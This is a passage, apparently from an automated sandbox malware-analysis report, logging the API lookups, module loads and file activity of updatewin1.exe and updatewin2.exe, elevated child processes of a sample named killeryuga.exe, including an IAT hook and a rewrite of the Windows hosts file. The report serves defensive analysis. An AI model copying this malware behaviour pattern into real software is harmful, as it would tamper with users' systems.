Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteW, address_out = 0x75fe3c71 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetInstanceExplorer, address_out = 0x76016399 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = Shell_NotifyIconA, address_out = 0x76218af2 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = DragAcceptFiles, address_out = 0x760f1bf1 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowsHookW, address_out = 0x74f98ca2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetMessageQueue, address_out = 0x74f6c8e7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSysColor, address_out = 0x74f56c3c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BroadcastSystemMessageW, address_out = 0x74f9c140 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = OpenDesktopA, address_out = 0x74f6011a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetCapture, address_out = 0x74f7ed56 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MsgWaitForMultipleObjects, address_out = 0x74f60b4a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefDlgProcW, address_out = 0x77194100 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DdeUnaccessData, address_out = 0x74fa82f4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClassInfoExW, address_out = 0x74f5b238 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x74f63ff8 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x74f63e75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
System (252)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:39 (UTC) True 1
Fn
Get Time type = Ticks, time = 122070 True 1
Fn
Get Time type = Performance Ctr, time = 18467392580 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #8: updatewin1.exe
671 0
»
Information Value
ID #8
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:00, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x9ec
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 9F0
0x 9F4
0x 9F8
0x A04
0x A08
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x00275000 0x00275FFF Marked Executable - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000260000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000007f0000:+0x77f6f6
...
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe show_window = SW_SHOW True 1
Fn
Module (154)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 16:36:35 (UTC) True 1
Fn
Get Time type = Ticks, time = 118685 True 1
Fn
Get Time type = Performance Ctr, time = 18090393828 True 1
Fn
Get Time type = Ticks, time = 118716 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-03-24 16:36:36 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 18121598718 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #9: updatewin2.exe
654 0
»
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:03, Reason: Self Terminated
Monitor Duration 00:00:02
OS Process Information
»
Information Value
PID 0x9fc
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A00
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x004E5000 0x004E5FFF Marked Executable - 32-bit - False
...
updatewin2.exe 0x00400000 0x0044CFFF Forced - 32-bit - False
...
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax 		False
...
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Fn
Data
Module (135)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x749c0000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin2.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
